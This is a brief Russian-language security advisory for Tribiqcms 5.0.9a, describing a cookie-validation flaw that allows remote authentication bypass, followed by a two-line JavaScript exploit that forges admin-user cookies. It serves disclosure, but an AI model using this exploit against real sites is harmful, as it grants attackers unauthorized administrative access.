Программа: Tribiqcms 5.0.9a

Уязвимость позволяет удаленному злоумышленнику обойти ограничения
безопасности на целевой системе. Уязвимость существует из-за ошибки в проверке
входных данных при обработке cookie. Эксплуатирование уязвимости приведет к
обходу механизма аутентификации на целевой системе.

Эксплоит:

javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=real_admin_name; path=/";
document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";

Оставить мнение